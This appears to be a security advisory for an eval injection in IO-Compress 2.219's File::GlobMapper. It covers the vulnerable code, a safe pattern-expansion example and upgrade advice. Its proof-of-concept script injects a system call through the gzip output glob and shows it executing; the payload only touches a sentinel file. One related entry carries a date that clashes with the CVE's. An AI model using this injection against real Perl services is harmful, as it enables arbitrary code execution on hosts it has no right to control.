# IO-Compress 2.219 Eval Injection

Published: 10 Jun 2026 00:00:00
Reported by: Joakim Bülow
Type: packetstorm (packetstorm.news)
Views: 16

Eval injection in File::GlobMapper::_getFiles enables code execution via the output glob in IO::Compress::*.

### Related

| Family | Title | Published |
|---|---|---|
| ATTACKERKB | CVE-2026-48962 | 27 May 2026 03:12 |
| CBLMariner | CVE-2026-48962 affecting package perl for versions less than 5.38.2-510 | 24 Jul 2024 00:12 |
| Circl | CVE-2026-48962 | 27 May 2026 04:30 |
| CNNVD | IO-Compress security vulnerability | 27 May 2026 00:00 |
| CVE | CVE-2026-48962 | 27 May 2026 03:12 |
| Cvelist | CVE-2026-48962 IO::Compress versions before 2.220 for Perl can execute arbitrary code in File::GlobMapper via an attacker-controlled output glob | 27 May 2026 03:12 |
| Debian CVE | CVE-2026-48962 | 27 May 2026 03:12 |
| EUVD | EUVD-2026-32048 | 27 May 2026 03:12 |
| GithubExploit | Exploit for CVE-2026-48962 | 10 Jun 2026 07:46 |
| Mageia | Updated perl-IO-Compress package fixes security vulnerabilities | 29 May 2026 05:12 |
### Summary

An eval injection vulnerability in `File::GlobMapper::_getFiles()` allows any attacker who can control the output fileglob argument passed to `IO::Compress::Gzip::gzip()`, `IO::Compress::Zip::zip()`, or any sibling function to execute arbitrary Perl code in the context of the running process.
No authentication is required. Impact is complete: confidentiality, integrity, and availability of the host process are fully compromised.

---

### Details

`File::GlobMapper::_parseOutputGlob()` builds an output filename template by wrapping the caller-supplied output pattern in Perl double-quotes and storing the result. `_getFiles()` then passes that string directly to `eval` without any sanitisation:

**`lib/File/GlobMapper.pm:316–321`**
```perl
$string =~ s/${noPreBS}#(\d)/\${$1}/g;
$string =~ s#${noPreBS}\*#\${inFile}#g;
$string = '"' . $string . '"';      # wrapped in double-quotes
$self->{OutputPattern} = $string;   # stored verbatim — no escaping
```

**`lib/File/GlobMapper.pm:342`**
```perl
eval "\$outFile = $self->{OutputPattern};" ;   # executed — injection point
```

`File::GlobMapper` is invoked automatically whenever **both** the input and output arguments to an `IO::Compress::*` / `IO::Uncompress::*` function are fileglob strings (delimited by `< >`). This is a documented, common calling convention. Affected functions include `gzip`, `zip`, `bzip2`, `deflate`, `rawdeflate`, and all `IO::Uncompress::*` counterparts.

Any character that closes or interpolates into the surrounding double-quoted Perl string — a literal `"`, a backtick, `${...}`, or `@{...}` — followed by arbitrary Perl code is executed verbatim.
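The template expansion described above does not need string `eval` at all. This added example (not IO-Compress project code; the function names `output_pattern_is_safe` and `expand_output_pattern` and the backslash-quoting rule are this example's own) expands a GlobMapper-style pattern by direct substitution, so an injection-shaped pattern becomes plain filename text, and adds a pre-flight check that callers on an unpatched 2.219 can apply before handing untrusted output patterns to the fileglob interface.

```perl
# Added example, not IO-Compress project code. Placeholder syntax follows the
# advisory: #1..#9 = capture group from the input glob, * = the matched input
# filename; a backslash quotes the next character (this example's own rule).
use strict;
use warnings;

# Reject any character that the vulnerable code would let escape from, or
# interpolate into, the double-quoted string it builds around the pattern.
sub output_pattern_is_safe {
    my ($pattern) = @_;
    return 0 if !defined $pattern || $pattern =~ /["\$\@`\\]/;
    return 1;
}

# Expand $pattern for one input file: $inFile is the matched filename,
# @groups are the input glob's capture groups ($groups[0] is #1).
sub expand_output_pattern {
    my ($pattern, $inFile, @groups) = @_;
    my ($out, $i) = ('', 0);
    while ($i < length $pattern) {
        my $c = substr($pattern, $i, 1);
        if ($c eq '\\' && $i + 1 < length $pattern) {
            $out .= substr($pattern, $i + 1, 1);   # quoted char is literal
            $i += 2;
        } elsif ($c eq '#' && substr($pattern, $i + 1, 1) =~ /^(\d)$/) {
            my $n = $1;
            die "pattern '$pattern' refers to missing capture group #$n\n"
                if $n < 1 || $n > @groups;
            $out .= $groups[$n - 1];
            $i += 2;
        } elsif ($c eq '*') {
            $out .= $inFile;
            $i += 1;
        } else {
            $out .= $c;                             # everything else is literal
            $i += 1;
        }
    }
    return $out;
}

# Constructed inputs: two benign templates and one injection-shaped pattern.
my $injection = 'out.gz"; system("touch /tmp/pwned"); #';
printf "benign  %s\n", expand_output_pattern('#1.gz', 'logs/app.txt', 'app');
printf "benign  %s\n", expand_output_pattern('*.gz', 'logs/app.txt');
printf "check   %s\n", output_pattern_is_safe($injection) ? 'accepted' : 'rejected';
# Even without the check, substitution keeps the payload as filename text.
printf "literal %s\n", expand_output_pattern($injection, 'x.txt');
```

The check is a stop-gap for code that cannot upgrade immediately; upgrading to 2.220 or later is the fix.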
    
---

### PoC

Save as `poc.pl` and run with `perl poc.pl`:

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);
use IO::Compress::Gzip qw(gzip);

my $dir      = tempdir(CLEANUP => 1);
my $sentinel = "/tmp/CVE_GlobMapper_RCE_$$";

# Create a legitimate input file that the input glob will match
open my $fh, '>', "$dir/test.txt" or die $!;
print $fh "data\n";
close $fh;

my $malicious = qq(<$dir/out.gz"; system("touch $sentinel"); #>);

print "Sentinel before: ", (-e $sentinel ? "EXISTS" : "absent"), "\n";

eval { gzip "<$dir/*.txt>" => $malicious };

if (-e $sentinel) {
    print "EXPLOITED — arbitrary command executed via eval injection\n";
    print "Sentinel: $sentinel\n";
    unlink $sentinel;
} else {
    print "Did not fire (check error: $@)\n";
}
```

**Expected output:**
```
Sentinel before: absent
EXPLOITED — arbitrary command executed via eval injection
Sentinel: /tmp/CVE_GlobMapper_RCE_<pid>
```

Confirmed on IO-Compress 2.219 / Perl 5.40.1 / Ubuntu 26.04.
    
---

### Impact

This is a **remote code execution** vulnerability. Any web application, API service, CLI tool, or batch-processing pipeline that accepts user input and passes it as the output fileglob argument to any `IO::Compress::*` function is vulnerable. The injected code runs with the full privileges of the calling process.

**Who is impacted:** Developers and operators of Perl applications that use `IO::Compress::*` functions with the fileglob calling convention and where the output pattern is derived from untrusted input, such as filename templates from web forms, REST API parameters, CLI arguments, or configuration files controlled by non-privileged users.

In setuid or privileged-daemon contexts, exploitation yields code execution at the elevated privilege level. The bug has been present since the initial release of `File::GlobMapper` (≈ 2005) and is present on every Linux distribution that ships the `perl` package.

### References

- https://nvd.nist.gov/vuln/detail/CVE-2026-48962
- https://github.com/pmqs/IO-Compress/commit/f2db247bf90d4cc7ee2710be384946081f3b4610.patch
- https://github.com/pmqs/IO-Compress/issues/73
- https://metacpan.org/release/PMQS/IO-Compress-2.220/changes
- http://www.openwall.com/lists/oss-security/2026/05/27/4
- https://github.com/advisories/GHSA-q6wx-vhvq-x7h6

### Scores (current as of 10 Jun 2026 00:00)

- Vulners AI Score: 5.9 (Medium risk)
- CVSS 3.1: 7.3
- EPSS: 0.00081